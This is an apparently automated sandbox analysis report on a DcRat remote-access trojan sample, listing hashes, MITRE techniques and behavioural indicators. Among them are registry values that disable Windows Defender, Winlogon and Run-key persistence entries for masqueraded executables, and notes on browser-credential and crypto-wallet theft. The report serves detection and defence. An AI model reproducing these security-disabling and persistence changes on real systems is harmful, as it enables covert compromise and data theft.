dcrat | b82f23ee8617e7ad47d7513fe175e7211564eed5442002927a415d7a035da5cf

Resubmissions

26-12-2022 00:04

221226-acrmcafe2y 10

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:02

26-12-2022 00:01

Analysis

max time kernel
85s
max time network
152s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
26-12-2022 00:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

15.7MB
MD5

b27e540aef37c99f3cfd2766c2e61784
SHA1

c516b74daec17d1bc788c54433cf10899ee07e92
SHA256

28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479
SHA512

641d5daaef91d535f279ce7fea1f7c8b50ba87040480602e51951dfc2f3345699d3161d38b1b2ab7b3d4fbbcc56e0d597f125ed65ea3971df4888cb4a63897cd
SSDEEP

393216:XhBqJ0CE8/eXkkM7cGGBNpuXU8ysXVqNIyc2KBcr27eEHTPX:RBe0CiMihuXU8yYqNIygdrX

Score

10^/10

dcrat discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ipinfo.io/ip

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies WinLogon for persistence 2 TTPs 19 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\odt\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\odt\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\odt\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\odt\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\Idle.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\odt\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\Idle.exe\", \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\odt\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\Idle.exe\", \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\odt\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\en-US\\smss.exe\", \"C:\\Users\\Admin\\Templates\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\odt\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\Idle.exe\", \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\odt\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\en-US\\smss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\odt\\spoolsv.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\Windows\\Media\\Sonata\\dwm.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\", \"C:\\runtimeMonitor\\sppsvc.exe\", \"C:\\odt\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\runtimeMonitor\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskkill.exe\", \"C:\\runtimeMonitor\\csrss.exe\", \"C:\\odt\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\lsass.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\Idle.exe\", \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\", \"C:\\odt\\dllhost.exe\""	ComdriverSvc.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

1.exe1.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3"	1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3"	1.exe

Process spawned unexpected child process 57 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	396	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	816	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	588	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1680	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	188	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	308	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4832	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2236	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2144	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2900	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2004	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4792	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2724	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2704	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1252	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3908	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4732	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3792	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3796	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4448	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1244	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1984	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3624	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	656	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3888	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5080	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	388	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3972	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2872	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2128	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3652	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3068	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4944	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5052	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5064	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4544	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3124	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4460	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4480	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4656	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3180	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3148	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4220	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3352	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1260	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1752	1052	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1408	1052	schtasks.exe

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\ProgramData\dc.exe	dcrat
C:\programdata\dc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
behavioral13/memory/2732-1408-0x00000000003D0000-0x00000000004DC000-memory.dmp	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
C:\Program Files\Windows Multimedia Platform\conhost.exe	dcrat
C:\Program Files\Windows Multimedia Platform\conhost.exe	dcrat

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Executes dropped EXE 10 IoCs

Processes:

1.exeany.exedc.exe1.exeComdriverSvc.exewsappz.execonhost.exeAnyDesk.exeAnyDesk.exeAnyDesk.exe

pid process

4644 1.exe
3944 any.exe
2404 dc.exe
4868 1.exe
2732 ComdriverSvc.exe
412 wsappz.exe
4456 conhost.exe
2852 AnyDesk.exe
5416 AnyDesk.exe
5656 AnyDesk.exe
Modifies file permissions 1 TTPs 6 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

300 icacls.exe
5020 icacls.exe
5904 icacls.exe
1284 icacls.exe
5384 icacls.exe
5864 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4644	1.exe
3944	any.exe
2404	dc.exe
4868	1.exe
2732	ComdriverSvc.exe
412	wsappz.exe
4456	conhost.exe
2852	AnyDesk.exe
5416	AnyDesk.exe
5656	AnyDesk.exe

pid	process
300	icacls.exe
5020	icacls.exe
5904	icacls.exe
1284	icacls.exe
5384	icacls.exe
5864	icacls.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1.exe1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 36 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\SearchUI = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\odt\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\odt\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\odt\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\ja-JP\\Idle.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\runtimeMonitor\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Windows NT\\Accessories\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\odt\\spoolsv.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Windows Media Player\\de-DE\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Admin\\Templates\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\runtimeMonitor\\sppsvc.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\runtimeMonitor\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\fontdrvhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\odt\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows Multimedia Platform\\conhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\runtimeMonitor\\csrss.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\Media\\Sonata\\dwm.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchUI = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Schema\\SearchUI.exe\""	ComdriverSvc.exe
